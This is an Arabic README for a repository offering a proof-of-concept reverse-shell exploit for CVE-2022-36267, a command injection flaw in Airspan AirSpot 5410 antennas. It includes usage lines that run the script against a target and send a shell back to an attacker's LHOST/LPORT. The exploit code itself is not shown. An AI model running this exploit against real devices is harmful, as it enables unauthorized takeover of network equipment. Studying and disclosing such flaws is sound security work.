
نص برهان المفهوم لـ CVE-2022-36267: يستغل ثغرة حقن أوامر عن بُعد غير مصادق عليها في هوائي Airspan AirSpot 5410.
يحتوي هذا المستودع على برنامج نصي لإثبات المفهوم (PoC) لشيل عكسي لاستغلال الثغرة CVE-2022-36267، وهي ثغرة حرجة في أجهزة Airspan AirSpot 5410. البرنامج النصي هو عرض عملي، مكملاً للتحليل المتعمق المقدم في مقالة المدونة "تقرير الثغرات في Airspan AirSpot 5410."
جميع أجهزة Airspan AirSpot 5410 من الإصدار 0.3.4.1-4 وما دونه.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

لأغراض تعليمية فقط.